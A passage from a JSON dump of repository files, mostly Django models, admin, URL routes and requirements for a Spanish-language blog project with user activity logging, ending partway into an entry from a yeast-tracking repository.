null=False,\n blank=False)\n author = models.BooleanField(null=False, blank=False, default=False)\n\n @receiver(post_save, sender=User)\n def create_user_profile(sender, instance, created, **kwargs):\n if created:\n UserProfile.objects.create(user=instance)\n\n @receiver(post_save, sender=User)\n def save_user_profile(sender, instance, **kwargs):\n if instance.social_auth and not instance.userprofile.image:\n # r = requests.get(staticfiles_storage.url('img/user_social.gif'))\n # with open('/tmp/user_social.gif', 'wb') as f:\n # f.write(r.content)\n # reopen = open('/tmp/user_social.gif', 'rb')\n # django_file = File(reopen)\n # instance.userprofile.image.save('user_social.gif', django_file, save=True)\n reopen = open('/home/trama/static_cdn/img/user_social.gif', 'rb')\n django_file = File(reopen)\n instance.userprofile.image.save('user_social.gif', django_file, save=True)\n instance.userprofile.save()\n\n def add_log(self, visited_user, operation):\n if self.user != visited_user.user:\n log = LogUser()\n if operation == \"edit\":\n log.user = self.user\n log.activity = Activity.objects.get(activity=\"user_edit\")\n log.description = \"Ha editado el usuario <a href='\" + self.get_absolute_url() + \"'>\" + self.user.first_name + \" \" + self.user.last_name + \"</a>\"\n if operation == \"view\":\n log.user = self.user\n log.activity = Activity.objects.get(activity=\"user_visit\")\n log.description = \"Ha visitado el perfil del usuario <a href='\" + visited_user.get_absolute_url() + \"'>\" + visited_user.user.first_name + \" \" + visited_user.user.last_name + \"</a>\"\n log.pre_save()\n \n def __unicode__(self):\n return self.user.first_name + \" \" + self.user.last_name\n \n def __str__(self):\n return self.user.first_name + \" \" + self.user.last_name\n \n def get_absolute_url(self):\n return reverse('user:profile', kwargs={'id': self.user.id})\n\n\n# Create your models here.\nclass UserFollow(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='user')\n follows = models.ForeignKey(User, on_delete=models.CASCADE, related_name='follows')\n\n class Meta:\n unique_together = (('user', 'follows'),)\n\n def __unicode__(self):\n return self.user.username + \" \" + self.follow_user.username\n\n def __str__(self):\n return self.user.username + \" \" + self.follow_user.username\n"
},
{
"alpha_fraction": 0.6512141227722168,
"alphanum_fraction": 0.6556291580200195,
"avg_line_length": 32.974998474121094,
"blob_id": "6095ae46f0b3cc8ec4fed8485e760695a7ffc43f",
"content_id": "0de51d84df13c7f656ed8aca597284905a0831fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1360,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 40,
"path": "/category/models.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.db import models\nfrom django.core.urlresolvers import reverse\n# Third party app imports\n# Local app imports\nfrom history.models import LogUser, Activity\n\n\nclass Category(models.Model):\n id = models.CharField(primary_key=True, max_length=5)\n sort = models.IntegerField(null=False, blank=False)\n name = models.CharField(null=False, blank=False, max_length=20)\n css_class = models.CharField(null=False, blank=False, max_length=20)\n timestamp = models.DateTimeField(auto_now=False, auto_now_add=True)\n updated = models.DateTimeField(auto_now=True, auto_now_add=False)\n\n def __unicode__(self):\n return self.name\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse('blog:category', kwargs={'id': self.id})\n\n def __iter__(self):\n return [self.id, self.sort, self.name, self.css_class, self.timestamp, self.updated]\n\n def add_log(self, user, operation):\n log = LogUser()\n if operation == \"view\":\n log.user = user\n log.activity = Activity.objects.get(activity=\"category_visit\")\n log.description = u\"Ha visitado la categoría de posts <a href='\" + self.get_absolute_url() + \"'>\" + self.name + \"</a>\"\n log.pre_save()\n\n class Meta:\n ordering = ['sort']\n"
},
{
"alpha_fraction": 0.6907514333724976,
"alphanum_fraction": 0.6965317726135254,
"avg_line_length": 27.72222137451172,
"blob_id": "0ae132967b43ffc794a8dbef525a28d8707aa76e",
"content_id": "ca83c39d12d96a9f1fa6fcf554de52a108c83b7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1039,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 36,
"path": "/gallery/models.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": " # coding=utf-8\n# Python imports\n# Django imports\nfrom django.db import models\n# Third party app imports\n# Local app imports\nfrom history.models import LogUser, Activity\nfrom post.models import Post\n\n\ndef upload_location_postimage(instance, filename):\n return 'post/' + instance.post_slug + '/' + filename\n\n\ndef add_log(user):\n log = LogUser()\n log.user = user\n log.activity = Activity.objects.get(activity=\"gallery_visit\")\n log.description = u\"Ha visitado la galería de imagenes\"\n log.pre_save()\n\n\n# Create your models here.\nclass Image(models.Model):\n caption = models.CharField(null=False, blank=True, max_length=50, default=\"No caption\")\n timestamp = models.DateTimeField(auto_now=False, auto_now_add=True)\n post_slug = models.SlugField(max_length=120)\n show_gallery = models.BooleanField(null=False, blank=False, default=False)\n image = models.ImageField(\n upload_to=upload_location_postimage,\n null=True,\n blank=True\n )\n\n def __str__(self):\n return self.caption\n"
},
{
"alpha_fraction": 0.6682692170143127,
"alphanum_fraction": 0.6694711446762085,
"avg_line_length": 24.24242401123047,
"blob_id": "f9f811096f9a1e6d4fab335c547b1fc82afc9cfd",
"content_id": "6728be8b8b94a3f545a37d9d587c55c149acd340",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 832,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 33,
"path": "/history/admin.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.contrib import admin\n# Third party app imports\n# Local app imports\nfrom .models import Activity, LogUser\n\n\nclass ActivityAdmin(admin.ModelAdmin):\n list_display = [\"activity\", \"icon\"]\n list_display_links = [\"activity\"]\n list_editable = [\"icon\"]\n list_filter = [\"activity\"]\n search_fields = [\"activity\"]\n\n class Meta:\n model = Activity\n\n\nclass LogUserAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"activity\", \"user\", \"description\", \"timestamp\"]\n list_display_links = [\"id\"]\n list_editable = [\"activity\", \"user\", \"description\"]\n list_filter = [\"activity\", \"user\"]\n search_fields = [\"activity\", \"user\"]\n\n class Meta:\n model = LogUser\n\n\nadmin.site.register(Activity, ActivityAdmin)\nadmin.site.register(LogUser, LogUserAdmin)"
},
{
"alpha_fraction": 0.6409550309181213,
"alphanum_fraction": 0.6433424949645996,
"avg_line_length": 35.797298431396484,
"blob_id": "809ee7fe7c4404ff44714554da5ac7abc9d347e0",
"content_id": "559dcf5f45cac1e2968b025b6a4f13303454874f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5445,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 148,
"path": "/post/models.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.db import models\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\n# Third party app imports\n# Local app imports\nfrom history.models import LogUser, Activity\n\n\ndef add_log_search(user, search):\n log = LogUser()\n log.user = user\n log.activity = Activity.objects.get(activity=\"search\")\n log.description = \"Se ha realizado la siguiente busqueda: \" + search\n log.pre_save()\n\n\ndef add_log_archive(user, archive):\n log = LogUser()\n log.user = user\n log.activity = Activity.objects.get(activity=\"archive\")\n log.description = \"Se ha accedido al archivo: \" + archive\n log.pre_save()\n\n\nclass Post(models.Model):\n STATUSES = (('IN', 'Inactive'), ('DR', 'Draft'), ('PB', 'Published'),)\n\n id = models.SlugField(primary_key=True, max_length=120)\n title = models.CharField(null=False, blank=False, max_length=120, default='none')\n summary = models.TextField(null=False, blank=False, default='none', max_length=300)\n content = models.TextField(null=False, blank=False, default='none')\n author = models.ForeignKey('user.UserProfile', null=True, on_delete=models.SET_NULL)\n status = models.CharField(max_length=2, choices=STATUSES, default='DR')\n published_date = models.DateTimeField(null=False, blank=False)\n timestamp = models.DateTimeField(auto_now=False, auto_now_add=True)\n updated = models.DateTimeField(auto_now=True, auto_now_add=False)\n image = models.ForeignKey('gallery.Image', null=True, on_delete=models.SET_NULL)\n\n def add_log(self, user, operation):\n log = LogUser()\n log.user = user\n if operation == \"create\":\n log.activity = Activity.objects.get(activity=\"post_create\")\n log.description = u\"Ha creado el post <a href='\" + self.get_absolute_url() + \"'>\" + self.title + \"</a>\"\n elif operation == \"edit\":\n log.activity = Activity.objects.get(activity=\"post_edit\")\n log.description = u\"Ha editado el post <a href='\" + self.get_absolute_url() + \"'>\" + self.title + \"</a>\"\n elif operation == \"view\":\n log.activity = Activity.objects.get(activity=\"post_visit\")\n log.description = u\"Ha visitado el post <a href='\" + self.get_absolute_url() + \"'>\" + self.title + \"</a>\"\n log.pre_save()\n\n def __unicode__(self):\n return self.title\n\n def __str__(self):\n return self.title\n\n def get_absolute_url(self):\n return reverse('blog:post', kwargs={'id': self.id})\n\n class Meta:\n ordering = ['-timestamp', '-updated']\n\n\nclass PostImage(models.Model):\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n image = models.ForeignKey('gallery.Image', on_delete=models.CASCADE)\n\n def __str__(self):\n return self.post.title + \": \" + self.post.image.caption\n\n\nclass PostImageSmall(models.Model):\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n image = models.ForeignKey('gallery.Image', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.post.title + \": \" + self.post.image.caption\n\n\nclass PostCategory(models.Model):\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n category = models.ForeignKey('category.Category', on_delete=models.CASCADE)\n\n def __str__(self):\n return self.post.title + \": \" + self.category.id\n\n\nclass PostComment(models.Model):\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n comment = models.ForeignKey('discuss.Comment', on_delete=models.CASCADE)\n\n class Meta:\n ordering = ['-post', '-comment__timestamp']\n\n def add_log(self, operation):\n log = 
LogUser()\n log.user = self.comment.user\n if operation == \"create\":\n log.activity = Activity.objects.get(activity=\"comment_post_create\")\n log.description = \"Ha creado el comentario <a href='\" + self.post.get_absolute_url() + \"#form_comments'>\" + self.comment.content[:15] + \"...</a>\"\n log.pre_save()\n\n def __str__(self):\n return self.post.title + \": \" + self.comment.content\n\n\nclass PostArchive(models.Model):\n year = models.PositiveIntegerField()\n month = models.PositiveIntegerField()\n posts = models.PositiveIntegerField()\n\n class Meta:\n unique_together = (('year', 'month'),)\n ordering = ['-year']\n\n\nclass PostView(models.Model):\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n date = models.DateTimeField(auto_now=False, auto_now_add=True)\n ip = models.GenericIPAddressField(null=False, blank=False)\n\n class Meta:\n ordering = ['-date']\n\n\nclass PostLike(models.Model):\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n user = models.ForeignKey(User, null=False, blank=False, on_delete=models.CASCADE)\n date = models.DateTimeField(auto_now=False, auto_now_add=True)\n\n def add_log(self, estado):\n log = LogUser()\n log.activity = Activity.objects.get(activity=\"post_like\")\n log.user = self.user\n if estado:\n log.description = \"Le gusta el post <a href='\" + self.post.get_absolute_url() + \"'>\" + self.post.title + \"</a>\"\n else:\n log.description = \"Ha dejado de gustarle el post <a href='\" + self.post.get_absolute_url() + \"'>\" + self.post.title + \"</a>\"\n log.pre_save()\n\n class Meta:\n unique_together = (('post', 'user'),)\n ordering = ['-date']"
},
{
"alpha_fraction": 0.7058823704719543,
"alphanum_fraction": 0.7277969717979431,
"avg_line_length": 31.11111068725586,
"blob_id": "581d1b77e1c2d1e52ef1c11a99896f2483d1a9a9",
"content_id": "4aa121657a4ba198d0fa6f1b265872af53473e16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 867,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 27,
"path": "/web/urls.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.conf.urls import handler404, handler500\n# Third party app imports\n# Local app imports\nfrom . import views\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^', include(\"post.urls\", namespace='blog')),\n url(r'^user/', include(\"user.urls\", namespace='user')),\n url(r'^accounts/', include('django.contrib.auth.urls')),\n url(r'^oauth/', include('social_django.urls', namespace='social')),\n]\n\nhandler404 = views.error_404\nhandler500 = views.error_500\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n"
},
{
"alpha_fraction": 0.5209712982177734,
"alphanum_fraction": 0.7086092829704285,
"avg_line_length": 17.875,
"blob_id": "8b6c2ea9b494246b3a9afc520f12dfcf720437cd",
"content_id": "202660f7daee98070b35cb1030ef27dabd668680",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 453,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 24,
"path": "/requirements.txt",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "certifi==2017.11.5\nchardet==3.0.4\ndefusedxml==0.5.0\nDjango==1.11.23\ndjango-ckeditor==5.4.0\ndjango-js-asset==0.1.1\ndjango-multiupload==0.5.2\ndjango-widget-tweaks==1.4.1\ndjango-wysiwyg==0.8.0\nidna==2.6\noauthlib==2.0.6\nolefile==0.44\nPillow==6.2.0\npsycopg2-binary==2.8.4\nPyJWT==1.5.3\npython3-openid==3.1.0\npytz==2017.3\nrequests==2.20.0\nrequests-oauthlib==0.8.0\nsix==1.11.0\nsocial-auth-app-django==2.1.0\nsocial-auth-core==1.6.0\ntyping==3.6.2\nurllib3==1.24.2\n"
},
{
"alpha_fraction": 0.6053593158721924,
"alphanum_fraction": 0.6065773367881775,
"avg_line_length": 38.14285659790039,
"blob_id": "55fac4219bc5804cda44b003b293325ce332abf2",
"content_id": "7e9b745ad0bc350eb9ee85fee04cf4b4f6be12ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 821,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 21,
"path": "/post/urls.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.conf.urls import url\n# Third party app imports\n# Local app imports\nfrom . import views\n\n\nurlpatterns = [\n url(r'^$', views.index_view, name='index'),\n url(r'^gallery/$', views.gallery_view, name='gallery'),\n url(r'^archive/(?P<year>\\d+)/(?P<month>\\d+)/$', views.archive_view, name='archive'),\n url(r'^category/(?P<id>[\\w]+)/$', views.category_view, name='category'),\n url(r'^search/(?P<filter>[\\w\\-]+)/$', views.search_view, name='search'),\n url(r'^post/create/$', views.post_create_view, name='post_create'),\n url(r'^post/(?P<id>[\\w\\-]+)/$', views.post_view, name='post'),\n url(r'^post/like/(?P<id>[\\w\\-]+)$', views.post_like_view, name='post_like'),\n url(r'^post/edit/(?P<id>[\\w\\-]+)/$', views.post_edit_view, name='post_edit'),\n\n]"
},
{
"alpha_fraction": 0.6620065569877625,
"alphanum_fraction": 0.6685855388641357,
"avg_line_length": 34.764705657958984,
"blob_id": "7ad96c8a54768403f552fc0982b5c76b39e7cb36",
"content_id": "6face332cefc25450a86f040d54ccb3b03ce2734",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1216,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 34,
"path": "/history/models.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.contrib.auth.models import User\nfrom django.db import models\n# Third party app imports\n# Local app imports\n\n\nclass Activity(models.Model):\n activity = models.CharField(primary_key=True, null=False, blank=False, max_length=20)\n icon = models.CharField(null=False, blank=False, max_length=20)\n\n def __str__(self):\n return self.activity\n\n\nclass LogUser(models.Model):\n activity = models.ForeignKey(Activity, on_delete=models.CASCADE)\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n description = models.CharField(max_length=200, null=False, blank=False)\n timestamp = models.DateTimeField(auto_now=False, auto_now_add=True)\n\n def pre_save(self):\n try:\n latest_log = LogUser.objects.filter(user=self.user).latest('timestamp')\n if latest_log.activity != self.activity or \\\n (latest_log.activity == self.activity and latest_log.description != self.description):\n self.save()\n except LogUser.DoesNotExist:\n self.save()\n \n def __str__(self):\n return self.user.username + \": \" + self.activity.activity + \" - \" + self.description\n"
},
{
"alpha_fraction": 0.671159029006958,
"alphanum_fraction": 0.6738544702529907,
"avg_line_length": 25.5,
"blob_id": "e9fe2ade75d61c228b1230977e52d729a1d0d208",
"content_id": "b9f018b755ddec96cead3af2ac56c195da27189a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 371,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 14,
"path": "/user/urls.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.conf.urls import url\n# Third party app imports\n# Local app imports\nfrom . import views\n\n\nurlpatterns = [\n url(r'^profile/(?P<id>[\\w]+)/$', views.about_user_view, name='profile'),\n url(r'^password/$', views.password, name='password'),\n url(r'^register/$', views.user_register_view, name='register'),\n]\n"
}
] | 12 |
Klas96/YeastTrack | https://github.com/Klas96/YeastTrack | c9ae833eaf7f5c537d659c30e4b391b31c4836fc | 3be95b508bfe42c53b754308ed2dd772c027a05e | 20e1e6afc98e16034f81be883bda478add913ab0 | refs/heads/master | 2022-01-22T23:22:49.485020 | 2022-01-15T21:50:30 | 2022-01-15T21:50:30 | 244,603,945 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.5976070761680603,
"alphanum_fraction": 0.6045340299606323,
"avg_line_length": 38.70000076293945,
"blob_id": "a0c5024879d7ee808cd8f7d9e524dd7160455ba9",
"content_id": "dd02c8d2b0777cb267fded9b37d91aa31bdf6c61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3176,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 80,
"path": "/UserInterface/Controls.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\n\nfrom Anlysis.VisulizeLinage import PlotLinageTree\nfrom Anlysis.PrintMotherDoughter import printMotherDoghuther\nfrom UserInterface.UpdateFrame import updateFrame\n\n\n#TODO Make this the control class With method update\nclass Controls:\n\n def __init__(self,video):\n self.video = video\n self.currentFrame = 1\n self.currentBlend = 0\n self.showMaskImg = False\n self.showCellID = True\n self.showLinagesTree = True\n self.showOptImg = True\n self.showWHI5ActivImg = False\n\n cv2.namedWindow('CellTracker')\n numFrames = video.getNumFrmes()\n cv2.createTrackbar(\"Frame\",'CellTracker',self.currentFrame,numFrames-1,self.changeFrame)\n cv2.createTrackbar(\"Channel\",'CellTracker',0,100,self.changeChanell)\n\n\n def startControls(self):\n self.updateFrame()\n #List With comand chars and coresponding function\n listOfComandsChars = [\"q\", \"s\", \"o\", \"i\", \"w\", \"l\",\"p\"]\n listOfComandsFunctions = [\"quit\", \"Show Segmentation\", \"show Opt Chan\", \"show cell ID\", \"show WHI5 Activ Threshold\", \"Print Lineage\",\"Plot Data\"]\n while(True):\n #global showMaskImg,showCellID,showLinagesTree,showOptImg,showWHI5ActivImg\n print(\"Options:\")\n for i in range(0,len(listOfComandsChars)):\n print(listOfComandsChars[i] + \" = \" + listOfComandsFunctions[i])\n\n key = cv2.waitKey(0)\n #input = str(input())\n print(\"Your input: \" + chr(key))\n if(key == ord('q')):\n break\n if(key == ord('s')):\n self.showMaskImg = not self.showMaskImg\n print(\"showMaskImage is now \" + str(self.showMaskImg))\n #updateFrame(video)\n if(key == ord(\"o\")):\n self.showOptImg = not self.showOptImg\n print(\"showOptImage is now \" + str(self.showOptImg))\n #updateFrame(video)\n if(key == ord(\"i\")):\n self.showCellID = not self.showCellID\n print(\"showCellID is now \" + str(self.showCellID))\n #updateFrame(video)\n if(key == ord(\"w\")):\n self.showWHI5ActivImg = not self.showWHI5ActivImg\n print(\"showWHI5ActivFrame is now \" + str(self.showWHI5ActivImg))\n #updateFrame(video)\n if(key == ord(\"l\")):\n trackedCells = self.video.getTrackedCells()\n printMotherDoghuther(trackedCells)\n PlotLinageTree(trackedCells)\n if(key == ord(\"p\")):\n trackedCells = self.video.getTrackedCells()\n plotFunction(trackedCells)\n\n self.updateFrame()\n\n def updateFrame(self):\n param = [self.currentFrame,self.currentBlend,self.showMaskImg,self.showCellID,self.showLinagesTree,self.showOptImg,self.showWHI5ActivImg]\n updateFrame(self.video,param)\n\n def changeFrame(self,frameNum):\n self.currentFrame = frameNum\n self.updateFrame()\n\n #Change Between Florecent And Video Channel\n def changeChanell(self,division):\n self.currentBlend = division\n self.updateFrame()\n"
},
{
"alpha_fraction": 0.5709342360496521,
"alphanum_fraction": 0.5709342360496521,
"avg_line_length": 15.11111068725586,
"blob_id": "0cdb2f4296ad2a25f50008d352b3219acbbe00d6",
"content_id": "6622532291bec978cbf4b34de54fc50708d3a7df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 18,
"path": "/test.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import unittest\n\nclass TestStringMethods(unittest.TestCase):\n\n def test_segmentation(self):\n #TODO\n pass\n\n def test_something(self):\n #TODO\n pass\n\n def test_somethingElse(self):\n #TODO\n pass\n\nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.7304295301437378,
"alphanum_fraction": 0.7356483340263367,
"avg_line_length": 31.350648880004883,
"blob_id": "8a3d9b2f00402e0c267719a9f54ecc300c7dd1bf",
"content_id": "024b57a8a10c3ce30f623aa821e5cb1ebc3d0a90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4982,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 154,
"path": "/Tracking/centroidTracker.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from scipy.spatial import distance as dist\nfrom collections import OrderedDict\nimport numpy as np\nfrom Segmentation.cellInstance import cellInstance\nfrom Tracking.TrackedCell import TrackedCell\n#vaiabels\n#objects\n#disappeared\n#maxDisappeared\nclass CentroidTracker():\n #Constructor\n\tdef __init__(self, maxDisappeared=50):\n\t\t# initialize the next unique object ID along with two ordered\n\t\t# dictionaries used to keep track of mapping a given object\n\t\t# ID to its centroid and number of consecutive frames it has\n\t\t# been marked as \"disappeared\", respectively\n\t\tself.nextObjectID = 0\n\t\tself.cellObjects = OrderedDict()\n\t\tself.disappeared = OrderedDict()\n\t\tself.frameNumber = 0\n\n\t\t#MAx disappeared before deleting\n\t\tself.maxDisappeared = maxDisappeared\n\n\t#Stors the centroid in next availibal ObjectID\n\t#pre1: centroid\n\t#pre2: size\n\tdef register(self, cellInstans, frameNum = -1):\n\t\t#Register in nex availibal object\n\t\t#self.objects[self.nextObjectID] = centroid\n\t\tself.cellObjects[self.nextObjectID] = TrackedCell(cellInstans,self.nextObjectID,frameNum)\n\t\tself.disappeared[self.nextObjectID] = 0\n\t\tself.nextObjectID += 1\n\n\t#Del object from object list and disappeared list\n\t#pre: objectID\n\tdef deregister(self, objectID):\n\t\t#del self.objects[objectID]\n\t\tdel self.cellObjects[objectID]\n\t\tdel self.disappeared[objectID]\n\n\tdef updateCellInst(self, cellInstances):\n\n\t\t#Is empty\n\t\tif len(cellInstances) == 0:\n\t\t\t#Mark all as disappeared\n\t\t\tfor objectID in list(self.disappeared.keys()):\n\t\t\t\tself.disappeared[objectID] += 1\n\n\t\t\t\t#If the object have been gone for long enough delet\n\t\t\t\tif self.disappeared[objectID] > self.maxDisappeared:\n\t\t\t\t\tself.deregister(objectID)\n\n\n\t\t\treturn(list(self.cellObjects.values()))\n\n\t\t#If no tracked object. 
Frst objects track all\n\t\tif len(self.cellObjects) == 0:\n\t\t\tfor i in range(0, len(cellInstances)):\n\t\t\t\tself.register(cellInstances[i],self.frameNumber)\n\n\n\t\tinputCentroids = np.zeros((len(cellInstances), 2), dtype=\"int\")\n\n\t\tfor i in range(0,len(cellInstances)):\n\t\t\tinputCentroids[i] = cellInstances[i].getPosition()\n\n\t\t#Try matching to current centroids\n\t\telse:\n\t\t\t#Grab the set of object IDs and corresponding centroids\n\t\t\t#objectIDs = list(self.objects.keys())\n\t\t\tcellObjectIDs = list(self.cellObjects.keys())\n\n\t\t\t#objectCentroids = list(self.objects.values())\n\n\t\t\t#List of trackdedCell Objects\n\t\t\tcellObjectList = list(self.cellObjects.values())\n\t\t\tcellObjectsCentroids = list()\n\n\t\t\t#Makeing centroid list\n\t\t\tfor cellObj in cellObjectList:\n\t\t\t\tcellObjectsCentroids.append(cellObj.getCentroid())\n\n\t\t\t#Compute the distance between each pair of object\n\t\t\tcellD = dist.cdist(np.array(cellObjectsCentroids), inputCentroids)\n\n\t\t\t#Find the smallest value in each row and then\n\t\t\t#Sort the rows so the row with smalest value is on top.\n\t\t\tcellRows = cellD.min(axis=1).argsort()\n\n\t\t\t#Finding smalest value in each colom\n\t\t\t#sorting using the previously computed row index list\n\t\t\tcellCols = cellD.argmin(axis=1)[cellRows]\n\n\t\t\t#Keeping track of used Rows and used coloms\n\t\t\tusedRows = set()\n\t\t\tusedCols = set()\n\n\t\t\tfor (row, col) in zip(cellRows, cellCols):\n\n\t\t\t\t#Ignore examined rows or colums\n\t\t\t\tif row in usedRows or col in usedCols:\n\t\t\t\t\tcontinue\n\n\n\t\t\t\t#set its new centroid, and reset the disappeared counter\n\t\t\t\tobjectID = cellObjectIDs[row]\n\t\t\t\tself.cellObjects[objectID].update(cellInstances[col])\n\t\t\t\tself.disappeared[objectID] = 0\n\n\t\t\t\t#Indicate that we have examined each of the row and\n\t\t\t\t#Column indexes, respectively\n\t\t\t\tusedRows.add(row)\n\t\t\t\tusedCols.add(col)\n\n\t\t\t#Compute both the row and column index we have NOT yet examined\n\t\t\tunusedRows = set(range(0, cellD.shape[0])).difference(usedRows)\n\t\t\tunusedCols = set(range(0, cellD.shape[1])).difference(usedCols)\n\n\t\t\t#in the event that the number of object centroids is\n\t\t\t#equal or greater than the number of input centroids\n\t\t\t#we need to check and see if some of these objects have\n\t\t\t#potentially disappeared\n\t\t\tif cellD.shape[0] > cellD.shape[1]:\n\t\t\t\t#loop over the unused row indexes\n\t\t\t\tfor row in unusedRows:\n\t\t\t\t\t#grab the object ID for the corresponding row\n\t\t\t\t\t#index and increment the disappeared counter\n\t\t\t\t\tobjectID = cellObjectIDs[row]\n\t\t\t\t\tself.disappeared[objectID] += 1\n\n\t\t\t\t\t#check to see if the number of consecutive\n\t\t\t\t\t#frames the object has been marked \"disappeared\"\n\t\t\t\t\t#for warrants deregistering the object\n\t\t\t\t\tif self.disappeared[objectID] > self.maxDisappeared:\n\t\t\t\t\t\tself.deregister(objectID)\n\n\t\t\t# otherwise, if the number of input centroids is greater\n\t\t\t# than the number of existing object centroids we need to\n\t\t\t# register each new input centroid as a trackable object\n\t\t\telse:\n\t\t\t\tfor col in unusedCols:\n\t\t\t\t\tself.register(cellInstances[col],self.frameNumber)\n\n\t\t#Update all cells in Disaperd list\n\t\t#for disi in self.disappeared:\n\t\tfor objectID in list(self.disappeared.keys()):\n\t\t\t#self.cellObjects[objectID].update()\n\t\t\tpass\n\n\n\t\t#frame number increases with one\n\t\tself.frameNumber = self.frameNumber + 
1\n\t\treturn(list(self.cellObjects.values()))\n"
},
{
"alpha_fraction": 0.5676429271697998,
"alphanum_fraction": 0.5997210741043091,
"avg_line_length": 22.899999618530273,
"blob_id": "1067cf0b72ad5e8b59b8c3aaecb6de2257dafe85",
"content_id": "92d81e4690e74ea45e05a3a617f343335d3dc015",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 717,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 30,
"path": "/Segmentation/cellInstance.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\n\nclass cellInstance:\n\n def __init__(self,contour,whi5Activ = -1):\n\n self.whi5Activ = whi5Activ\n self.contour = contour\n\n def getPosition(self):\n moments = cv2.moments(self.contour)\n #TOOD Byt till funktioner ist??\n cx = int(moments['m10']/moments['m00'])\n cy = int(moments['m01']/moments['m00'])\n position = (cx,cy)\n return(position)\n\n def getSize(self):\n moments = cv2.moments(self.contour)\n size = moments['m00']\n return(size)\n\n def getWHI5Activity(self):\n return(self.whi5Activ)\n\n def getContour(self):\n return(self.contour)\n\n def setWhi5Activity(whi5Activ):\n self.whi5Activ = whi5Activ\n"
},
{
"alpha_fraction": 0.7122507095336914,
"alphanum_fraction": 0.7749287486076355,
"avg_line_length": 38,
"blob_id": "806059215d778acaee8a95599c4017b918a0efbe",
"content_id": "40b4d0eedebd9277a48df29f67ad2f1c68ddef50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 702,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 18,
"path": "/UserInterface/LoadData/LoadChannels.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
